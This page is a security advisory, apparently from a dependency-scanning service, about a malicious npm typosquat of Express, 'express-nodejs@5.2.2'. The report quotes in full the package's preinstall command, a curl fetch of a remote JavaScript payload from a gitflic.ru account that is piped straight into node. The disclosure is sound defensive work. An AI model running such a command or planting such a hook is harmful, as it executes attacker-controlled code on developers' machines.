Logo
npm

express-nodejs@5.2.2

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17243

Ecosystem

npm

Summary

express-nodejs@5.2.2 is a typosquat of the Express framework that copies Express's package metadata (author TJ Holowaychuk, repository expressjs/express, homepage expressjs.com, matching description and keywords) while adding a malicious npm preinstall hook. The preinstall script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, which fetches a JavaScript payload from a third-party gitflic.ru user account (fronted by a web.archive.org wrapper) and pipes it directly into the node interpreter on npm install. The remote content is unpinned, unverified, hosted on infrastructure unrelated to the Express publisher, and controlled by whoever owns the gitflic.ru/hellscripter account; the executed code can be changed at any time without republishing the npm package.

Source: amazon-inspector (660b6a49ca7ef178fe60b6f68ae8df4ac4364c05429684c97392dee267712688)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.